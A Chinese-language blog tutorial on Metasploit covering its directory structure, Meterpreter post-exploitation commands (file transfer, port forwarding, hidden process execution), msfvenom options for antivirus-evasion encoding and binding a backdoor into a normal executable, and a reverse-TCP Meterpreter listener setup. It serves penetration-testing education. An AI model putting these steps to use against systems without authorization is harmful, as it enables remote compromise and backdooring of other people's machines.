<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>Metasploit详解 | Asc0t6e</title><meta name="description" content="Metasploit详解"><meta name="author" content="Asc0t6e"><meta name="copyright" content="Asc0t6e"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Metasploit详解"><meta name="twitter:description" content="Metasploit详解"><meta name="twitter:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/27.jpg"><meta property="og:type" content="article"><meta property="og:title" content="Metasploit详解"><meta property="og:url" content="https://www.ascotbe.com/2019/06/07/Metasploit%E8%AF%A6%E8%A7%A3/"><meta property="og:site_name" content="Asc0t6e"><meta property="og:description" content="Metasploit详解"><meta property="og:image" content="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/27.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.ascotbe.com/2019/06/07/Metasploit%E8%AF%A6%E8%A7%A3/"><link rel="prev" title="P4wnP1全家桶安装及实战" href="https://www.ascotbe.com/2019/06/29/raspberry/"><link rel="next" title="如何释放存在EXE上的资源文件" href="https://www.ascotbe.com/2019/05/26/%E5%A6%82%E4%BD%95%E9%87%8A%E6%94%BE%E5%AD%98%E5%9C%A8EXE%E4%B8%8A%E7%9A%84%E8%B5%84%E6%BA%90%E6%96%87%E4%BB%B6/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.ascotbe.com/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.0"></head><body><canvas class="fireworks"></canvas><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">Asc0t6e</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor_Swift"><i class="fa-fw fa fa-link"></i><span> Taylor_Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.jpeg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">86</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/Loophole"><i class="fa-fw fa fa-link"></i><span> Loophole</span></a></div><div class="menus_item"><a class="site-page" href="/Taylor_Swift"><i class="fa-fw fa fa-link"></i><span> Taylor_Swift</span></a></div><div class="menus_item"><a class="site-page" href="/Links/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#0x00-Metasploit体系框架"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">0x00 Metasploit体系框架</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#0x01-文件目录解析"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">0x01 文件目录解析</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#data"><span class="toc_mobile_items-number">2.1.</span> <span class="toc_mobile_items-text">data</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#modules"><span class="toc_mobile_items-number">2.2.</span> <span class="toc_mobile_items-text">modules</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#scripts"><span class="toc_mobile_items-number">2.3.</span> <span class="toc_mobile_items-text">scripts</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#tools"><span class="toc_mobile_items-number">2.4.</span> <span class="toc_mobile_items-text">tools</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#plugins"><span class="toc_mobile_items-number">2.5.</span> <span class="toc_mobile_items-text">plugins</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#0x02-常用命令解析"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">0x02 常用命令解析</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#基本命令"><span class="toc_mobile_items-number">3.1.</span> <span class="toc_mobile_items-text">基本命令</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#文件系统命令"><span class="toc_mobile_items-number">3.2.</span> <span class="toc_mobile_items-text">文件系统命令</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#网络命令"><span class="toc_mobile_items-number">3.3.</span> <span class="toc_mobile_items-text">网络命令</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#0x03-后渗透"><span class="toc_mobile_items-number">4.</span> <span class="toc_mobile_items-text">0x03 后渗透</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#msfvenom"><span class="toc_mobile_items-number">4.1.</span> <span class="toc_mobile_items-text">msfvenom</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#如何连接呢？"><span class="toc_mobile_items-number">4.2.</span> <span class="toc_mobile_items-text">如何连接呢？</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#编码图片"><span class="toc_mobile_items-number">4.3.</span> <span class="toc_mobile_items-text">编码图片</span></a></li></ol></li></ol></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-Metasploit体系框架"><span class="toc-number">1.</span> <span class="toc-text">0x00 Metasploit体系框架</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-文件目录解析"><span class="toc-number">2.</span> <span class="toc-text">0x01 文件目录解析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#data"><span class="toc-number">2.1.</span> <span class="toc-text">data</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#modules"><span class="toc-number">2.2.</span> <span class="toc-text">modules</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#scripts"><span class="toc-number">2.3.</span> <span class="toc-text">scripts</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#tools"><span class="toc-number">2.4.</span> <span class="toc-text">tools</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#plugins"><span class="toc-number">2.5.</span> <span class="toc-text">plugins</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-常用命令解析"><span class="toc-number">3.</span> <span class="toc-text">0x02 常用命令解析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#基本命令"><span class="toc-number">3.1.</span> <span class="toc-text">基本命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#文件系统命令"><span class="toc-number">3.2.</span> <span class="toc-text">文件系统命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#网络命令"><span class="toc-number">3.3.</span> <span class="toc-text">网络命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-后渗透"><span class="toc-number">4.</span> <span class="toc-text">0x03 后渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#msfvenom"><span class="toc-number">4.1.</span> <span class="toc-text">msfvenom</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#如何连接呢？"><span class="toc-number">4.2.</span> <span class="toc-text">如何连接呢？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#编码图片"><span class="toc-number">4.3.</span> <span class="toc-text">编码图片</span></a></li></ol></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://gitee.com/asc0t6e/Random-img/raw/master/Blog/27.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">Metasploit详解</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2019-06-07<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2020-03-09</time><div class="post-meta-wordcount"><div class="post-meta-pv-cv"><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>阅读量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h2 id="0x00-Metasploit体系框架"><a href="#0x00-Metasploit体系框架" class="headerlink" title="0x00 Metasploit体系框架"></a>0x00 <code>Metasploit</code>体系框架</h2><p><a href="https://github.com/Ascotbe/Random-img/blob/master/MSF/1.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="1" class="fancybox"><img alt="1" title="1" data-src="https://github.com/Ascotbe/Random-img/blob/master/MSF/1.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h2 id="0x01-文件目录解析"><a href="#0x01-文件目录解析" class="headerlink" title="0x01 文件目录解析"></a>0x01 文件目录解析</h2><p>核心文件包括<code>data</code>、<code>modules</code>、<code>scripts</code>、<code>tools</code>、<code>plugins</code></p>
<h3 id="data"><a href="#data" class="headerlink" title="data"></a>data</h3><p>该文件里常用的的功能在<code>wordlists</code>（字典）里面</p>
<h3 id="modules"><a href="#modules" class="headerlink" title="modules"></a>modules</h3><p>该文件夹里包括了<code>msf</code>最核心的几个文件</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">auxiliary（漏洞辅助模块一般是没有攻击载荷的漏洞攻击)</span><br><span class="line">Exploits（渗透攻击模块)</span><br><span class="line">st（开发模块）</span><br><span class="line">pads（漏洞负载模块)</span><br><span class="line">Encode码器模块）</span><br><span class="line">Nops（空指令模块&gt;</span><br></pre></td></tr></table></figure></div>

<h3 id="scripts"><a href="#scripts" class="headerlink" title="scripts"></a>scripts</h3><p>该文件夹里面包含这各种脚本</p>
<h3 id="tools"><a href="#tools" class="headerlink" title="tools"></a>tools</h3><p>该文件夹中存放着大量的使用工具</p>
<h3 id="plugins"><a href="#plugins" class="headerlink" title="plugins"></a>plugins</h3><p>该文件夹放着大量插件</p>
<h2 id="0x02-常用命令解析"><a href="#0x02-常用命令解析" class="headerlink" title="0x02 常用命令解析"></a>0x02 常用命令解析</h2><ul>
<li><code>Meterpreter</code>表示连接的会话<code>MSF</code>表示未连接的会话</li>
</ul>
<h3 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>基本命令</h3><ul>
<li><code>background</code></li>
</ul>
<p>如果想要在<code>MSF</code>终端执行其他任务，可以使用该命令把<code>Meterpreter</code>终端隐藏在后台</p>
<ul>
<li><code>sessions</code></li>
</ul>
<p>该命令可以查看已经获取的会话，如果想继续与某会话进行交互可以使用 <code>sessions -i ID</code>（使用<code>sessions</code>命令后会获取每个的<code>ID</code>号填入数字就行）</p>
<ul>
<li><code>quit</code></li>
</ul>
<p>该命令关闭当前<code>Meterpreter</code>会话，返回<code>MSF</code>终端</p>
<ul>
<li><code>shll</code></li>
</ul>
<p>该命令可以获取系统控制台<code>shell</code>，如果目标系统上的命令行可执行程序不存在或者进制访问，那么<code>shell</code>就会出错，如果运行成功会跳转到目标系统的<code>cmd</code>窗口(用<code>cmd</code>做比喻)</p>
<ul>
<li><code>irb</code></li>
</ul>
<p>该命令可以在<code>Meterpreter</code>会话里与<code>Ruby</code>终端进行交互，直接调用<code>MSF</code>封装好的函数（函数详情待补充，可执行百度）</p>
<h3 id="文件系统命令"><a href="#文件系统命令" class="headerlink" title="文件系统命令"></a>文件系统命令</h3><p>文件系统命令允许<code>Meterpreter</code>与目标系统进行交互，包括上传文件，下载文件，截图桌面等等功能。</p>
<ul>
<li><code>cat</code></li>
</ul>
<p>该命令可以查看文件内容</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat c:\\\1.txt</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>getwd</code></li>
</ul>
<p>该命令可以 获取目标机上当前的工作目录，相似的命令还有<code>getlwd</code></p>
<ul>
<li><code>upload</code></li>
</ul>
<p>该命令<code>Meterpreter</code>中的<code>upload</code>可以上传文件或文件夹到目标机器上</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload 1.exe c:\\</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>download</code></li>
</ul>
<p>该命令<code>download</code>从目标机上下载文件或文件夹</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">download c:\\\Ascotbe\\\2.exe</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>edit</code></li>
</ul>
<p>该命令可以调用<code>vi</code>编辑器，对目标文件进行编辑</p>
<ul>
<li><code>search</code></li>
</ul>
<p>对目标系统的文件进行搜索</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-d 指定搜索的起始目录或者驱动，如果为NULL将全盘搜索</span><br><span class="line">-f 指定搜索的文件或者部分文件名，可以用*匹配</span><br><span class="line">-r 递归搜索子目录</span><br></pre></td></tr></table></figure></div>

<p>比如</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search -d c:\\Ascotbe -f *.txt（在目标系统的Ascotbe文件夹中搜索txt文件）</span><br></pre></td></tr></table></figure></div>

<h3 id="网络命令"><a href="#网络命令" class="headerlink" title="网络命令"></a>网络命令</h3><ul>
<li><code>portfwd</code></li>
</ul>
<p>该命令是个内嵌的端口转发器，一般在目标主机某些端口不允许直接访问的时候，比如所某些端口只能内网访问</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">-l 要监听的本地端口。</span><br><span class="line">-L 要监听的本地主机（可选）</span><br><span class="line">-p 要连接的远程端口</span><br><span class="line">-r 要连接的远程主机</span><br></pre></td></tr></table></figure></div>

<p>比如</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 6666 -p 445 -r 192.168.1.1（192.168.1.1这个IP的不对外开放的端口445映射到6666，访问6666就等于访问了445端口）</span><br><span class="line"></span><br><span class="line">这样就可以直接用rdesktop命令访问了</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>route</code></li>
</ul>
<p>该命令用于显示目标主机的路由信息</p>
<ul>
<li><code>ps</code></li>
</ul>
<p>该命令用于获得目标主机上正在运行的进程信息</p>
<ul>
<li><code>migrate</code></li>
</ul>
<p>该命令可以把<code>Meterpreter</code>会话从一个进程移植到另一个进程的内存空间中</p>
<ul>
<li><code>execute</code></li>
</ul>
<p>该命令可以在目标机上执行文件</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">-H 创建从视图中隐藏的进程。</span><br><span class="line">-a 传递给命令的参数</span><br><span class="line">-c 通道化I &#x2F; O（交互所需）</span><br><span class="line">-d 使用-m时要启动的“虚拟”可执行文件。</span><br><span class="line">-f 要运行的可执行命令。</span><br><span class="line">-i 创建后与流程交互。</span><br><span class="line">-k 在meterpreters当前桌面上执行进程</span><br><span class="line">-m 从内存中执行。</span><br><span class="line">-s 作为会话用户在给定会话中执行进程</span><br><span class="line">-t 使用当前模拟的线程令牌执行进程</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>getpid</code></li>
</ul>
<p>获取进程<code>PID</code></p>
<ul>
<li><code>kill</code></li>
</ul>
<p>结束<code>PID</code>的程序</p>
<ul>
<li><code>getuid</code></li>
</ul>
<p>用于获取<code>Meterpreter</code>会话的用户名从而查看当前会话权限</p>
<ul>
<li><code>sysinfo</code></li>
</ul>
<p>查看目标系统的一些信息</p>
<ul>
<li><code>shutdown</code></li>
</ul>
<p>用来关闭目标机器</p>
<h2 id="0x03-后渗透"><a href="#0x03-后渗透" class="headerlink" title="0x03 后渗透"></a>0x03 后渗透</h2><h3 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h3><ul>
<li>添加载荷<code>payload</code></li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–p</span><br><span class="line">(--payload-options 列出payload选项)</span><br></pre></td></tr></table></figure></div>

<ul>
<li>查看所有<code>payload encoder nops</code></li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">–l</span><br></pre></td></tr></table></figure></div>

<ul>
<li>输出文件格式</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–f</span><br><span class="line">(--help-formats 列出所有文件格式)</span><br></pre></td></tr></table></figure></div>

<ul>
<li>编码免杀</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–e</span><br><span class="line">全部有46种编码，具体请看最后一张图</span><br></pre></td></tr></table></figure></div>

<ul>
<li>选择架构平台</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–a</span><br><span class="line">x86|x64|x86_64</span><br></pre></td></tr></table></figure></div>

<ul>
<li>攻击负荷的平台</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--platform</span><br><span class="line">（windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe）</span><br></pre></td></tr></table></figure></div>

<ul>
<li>文件输出</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–o</span><br><span class="line">直接用直接用 &gt; a.exe 来代替该参数</span><br></pre></td></tr></table></figure></div>

<ul>
<li>生成<code>payload</code>的最大长度</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">–s  就是文件大小</span><br></pre></td></tr></table></figure></div>

<ul>
<li>避免使用的字符</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–b</span><br><span class="line">例如：不使用 ‘\0f’</span><br></pre></td></tr></table></figure></div>

<ul>
<li>编码次数</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">–i</span><br></pre></td></tr></table></figure></div>

<ul>
<li>添加自己的shellcode</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">–c</span><br></pre></td></tr></table></figure></div>

<ul>
<li>捆绑</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">–x|-k</span><br><span class="line">例如：原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。</span><br></pre></td></tr></table></figure></div>

<h3 id="如何连接呢？"><a href="#如何连接呢？" class="headerlink" title="如何连接呢？"></a>如何连接呢？</h3><p>步骤如下</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">set LHOST 192.168.15.131</span><br><span class="line">set LPORT 4444</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure></div>

